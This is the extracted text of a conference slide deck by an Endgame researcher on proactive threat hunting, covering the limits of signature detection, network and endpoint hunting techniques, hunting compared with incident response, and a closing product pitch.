1

Hunting Before a Known Incident

Mark DufresneDirector of Malware Research and Threat Intelligence

Endgame

2Agenda

• Who am I?• Assume you are compromised– Defenses fail. All the time.

• Be Proactive, Think Offense: Hunt!– What is hunt– Hunt techniques– Benefits of hunt

• Hunt vs. traditional IR• Challenges of hunting and how to overcome• Hunting best practices

3About Me

• Previous Experience– 13 years at NSA

• Mix of offense and defense • Currently– Director of Malware Research and Threat Intelligence at Endgame

4

The cycle isn’t working: prevention, detection, triage, response

Today’s Reality

• Prevention is important but will be bypassed• Search and signature-based detection is always behind• Often, notification is external• Often, additional adversaries are already active while

a known incident is closed

5Why Does Search/Signature Detection Fail?

• On your network– Encryption– Cloud services – staging, C2, exfil…blends in – Tailored and/or ephemeral attack infrastructure

• On your endpoints – Polymorphism– Malware customization and diversification– Use of legitimate creds and admin tools - Malware as last resort

• Assume compromise!– Someone else’s IOCs might not help you– Signatures won’t find everything

• They won’t find what hasn’t been seen before

Attacks are changing

6Be Proactive, Think Offense

• Adversaries are eating your lunch• You can’t afford to wait • Offensive, proactive discovery must be the

response– Search is necessary but insufficient– Look for techniques used by attackers– Look for patterns in the right data

Hunt within your networks, a.k.a Continuous IR

7Hunting

• Hunting is the proactive, stealthy, and methodical pursuit and eviction of adversaries inside your network without relying on IOCs– Detect and eliminate known as well as never-before-seen adversaries

• Adversaries operate on your systems. They leave a trail– Understand what actions they take in the OS: chokepoints– Understand breadcrumbs they leave on and across systems: patterns and

anomalies.• Gain the right visibility, collect the right data, analyze, detect, and

respond– Lock down systems while you’re doing it– Be stealthy

8Common Hunt Methods and Techniques

• Indicator of Compromise (IOC)• Network• Endpoint• Manual vs. scheduled vs. continuous• Outliers/oddities vs. anomaly detection

9Indicator Hunting? (Searching)

• What’s search good for?– Will help you react to an external notification– Will help you find well-known campaigns– Will help you consistently find unsophisticated threats– Will help you pivot on IOCs you find in your own network

• Determine the extent of an incident• Your hunt platform needs to facilitate search– Search is today’s security muscle memory– But a hunter needs to do more

9

If you know what you are looking for, it is not hunt, it is search

10Hunting on the Network

• Network data is more noisy than host data– But, it’s still valuable– Best if you can tie to process

• Listeners– What ports are listening only a few systems?– What processes have listening sockets on only a few systems?

• DNS resolutions– What looks like it could be DGA?– What looks like it’s trying to masquerade as a real site?

• Beaconing– What connections look like they could be malware beacons?

• Choose where to focus hunt, collect, analyze, detect, respond

10

11Hunting on Endpoints

• Autoruns locations– What’s persisting on only a few hosts?– What’s executing out of a strange location?

• Running processes– What has a hash mismatch across hosts?– Which process has a loaded module not present on other systems?

• Execution artifacts– What strange powershell commands have been run?– Where do I see unusual remote process executions?

• Many other possibilities• Again - choose, collect, analyze, detect, respond

11

12Benefits of Hunt

• Reduce dwell time before discovery Reduced costs– Shorter dwell time usually means reduced incident complexity– Shorter dwell time usually means less loss or damage

• Break the cycle of reactivity• Build new security muscle memory– By continuous hunting, one gains an ability to see and react to

patterns and anomalies

“Organizations that proactively work to discover incidents — ‘hunt’ for them — have a better chance of finding them and effectively reducing their impact” Gartner 2016

13Hunt and Incident Response

• Very similar methods and skills required• Similar tools and techniques• Different starting point – Hunt: Assume breach and find it– IR: Known (or suspected) penetration

• Steps after discovery are remarkably similar• Don’t wait for the incident. Go find it.– IR teams can be the hunters– So, consider hunting

13

14Hunt Challenges and Solutions

14

Challenge Solution

Lack of resources Start with free tools(Hunting on the Cheap)

Difficulty hiring skilled huntersLack of time

Automate analysisGenerate detections based on hunt techniques

Drowning in data Data science and machine learningStart small and limited in scope

Tipping off the adversary Stealth tools and techniques

To hunt effectively, consistently, and at scale in any organization, you need a platform that augments and assists your team

15Endgame AdvantagesMulti-Mode OperationBuilt-in options for discovery, on-demand deployment, and persistence

StealthPrevents adversary disruption and evasion

IOC-Independent DetectionDetect never-before-seen and unique attacks

Tailored & Surgical ResponseThread-level response prevents disruption of normal business

AutomationEmpowers Tier 1& 2 analysts & minimizes time to remediation

Intelligent CollectionReal-time Automated answers to critical questions

16Summary

• The current detection and IR cycle doesn’t work• Transform the IR cycle into a Hunt cycle• Start hunting now• Automate, automate, automate

16

Stop by Endgame table for a demo!